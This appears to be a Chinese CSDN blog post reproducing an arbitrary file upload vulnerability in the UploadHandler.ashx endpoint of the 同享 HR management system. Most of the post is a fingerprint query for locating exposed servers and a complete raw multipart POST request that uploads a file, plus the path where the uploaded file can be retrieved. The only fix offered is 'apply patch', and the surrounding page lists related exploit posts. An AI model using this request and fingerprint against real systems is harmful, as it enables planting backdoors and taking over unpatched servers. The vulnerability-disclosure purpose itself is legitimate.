同享人力资源管理系统UploadHandler.ashx接口存在任意文件上传漏洞

于 2024-08-20 10:39:12 发布
阅读量178 收藏 2
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141351783
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1.漏洞描述

同享人力资源管理系统UploadHandler.ashx接口存在任意文件上传漏洞

2.影响版本

同享人力资源管理系统

body="/Assistant/Default.aspx"

 

3.漏洞复现

漏洞链接:http://xx.xx.xx.xxx.xxx/Handler/Uploadfile2/179142.txt

漏洞数据包:

POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 185
Content-Type: multipart/form-data; boundary=1a875087c9e440c032415f9a589cd3a3

--1a875087c9e440c032415f9a589cd3a3
Content-Disposition: form-data; name="Filedata"; filename="266137.txt"
Content-Type: text/plain

189745325
--1a875087c9e440c032415f9a589cd3a3--

 

 

4.修复建议

打补丁

 

 

外道・輪廻天生
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 任意文件上传漏洞复现
0xSec
08-02 201
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
同享TXEHR V15人力管理平台DownloadFile接口任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 192
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
qq_36334672的博客
01-24 355
F22服装管理软件系统。
漏洞复现】F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
失心少年
12-08 790
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!广州锦铭泰软件科技有限公司开发的F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞复现
0xSec
07-11 544
同享人力资源管理系统-TXEHR V15 DownloadTemplate.asmx 接口存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
文件上传漏洞(三)
不秃头的程序Yang
05-21 304
四、绕过黑名单上传 1、简介 上传模块,有时候会写成黑名单限制,在上传文件的时获取后缀名,再把后缀名与程序中黑名单进行检测,如果后缀名在黑名单的列表内,文件将禁止文件上传。 2、代码分析 首先是检测 submit 是否有值,获取文件的后缀名,进行黑名单对比,后缀名不在黑名单内,允许上传。 3、上传攻击 上传图片时,如果提示不允许 php、asp 这种信息提示,可判断为黑名单限制,上传黑名单以外的后缀名即可。 在 iis 里 asp 禁止上传了,可以上传 asa cer cdx 这些后缀,如在网站里允许
利用ashx文件实现文件的上传功能
HerryDong的博客
09-05 3215
原来以为文件上传是一个比较简单的功能,结果搞了一个晚上才搞定~这里主要介绍两种方法实现。 方法一:Form表单提交 html代码: <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>上传文件</title> <script ...
uploadhandler.php,多个WordPress主题'upload-handler.php'任意文件上传漏洞
weixin_34175919的博客
03-26 111
发布日期:2013-11-17更新日期:2013-11-19受影响系统:WordPress WordPress描述:--------------------------------------------------------------------------------BUGTRAQ ID: 63768WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL ...
uploadhandler.php,WordPress Kernel Theme ‘upload-handler.php’任意文件上传漏洞
weixin_29644109的博客
03-26 79
javascript中apply、call和bind的区别在JS中,这三者都是用来改变函数的this对象的指向的,他们有什么样的区别呢.在说区别之前还是先总结一下三者的相似之处:1.都是用来改变函数的this对象的指向的.2.第一个参数都是this要指向的对 ...AIX UNIX 系统管理、维护与高可用集群建设——数据库结构设计在对数据库类应用进行优化的过程中我们了解到一个原则,即思想上要从结构...
asp.net利用ashx文件实现文件的上传功能
10-15
在`UploadHandler.ashx`中,处理方式与第一种方法基本相同,只是现在请求是非同步的,因此可以在不刷新页面的情况下完成文件上传。 ### 知识点总结: 1. **ASP.NET HTTP Handler (ASHX)**:ASHX文件是处理HTTP请求...
HF人力资源管理系统源码
05-08
"HF人力资源管理系统源码"是一个专门针对企业内部人力资源管理需求设计和开发的系统。这个系统的核心目标是帮助企业高效地管理员工信息、招聘流程、绩效评估、培训与发展等人力资源相关事务。下面将对这个系统的组成...
【ASP.NET编程知识】asp.net利用ashx文件实现文件的上传功能.docx
05-18
然后,在服务器端,可以使用 IHttpHandler 接口来处理文件上传。 以下是 HTML 代码: ```html <form action="UploadHandler.ashx" method="post" enctype="multipart/form-data"> 上传" /> ``` UploadHandler....
jQuery插件ajaxfileupload.js实现上传文件
10-22
`AjaxUpload`对象实例化后,配置上传的URL(默认为`/Common/UploadHandler.ashx?fileType=file`)和其他参数,如文件类型检查(在`onSubmit`回调中实现)。 ```javascript function g_AjxUploadFile(btn, doc, ...
HTML+ASHX上传传图片.zip
04-12
<form action="UploadHandler.ashx" method="post" enctype="multipart/form-data"> 选择图片:<input type="file" name="imageFile"><br> 上传"> ``` 注意`enctype="multipart/form-data"`,这是上传文件时...
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 443
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 269
AI安全-文生图
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 702
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
最新发布
rolt的专栏
08-19 674
好,我们看,首先,电源管理这里,有两个状态
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值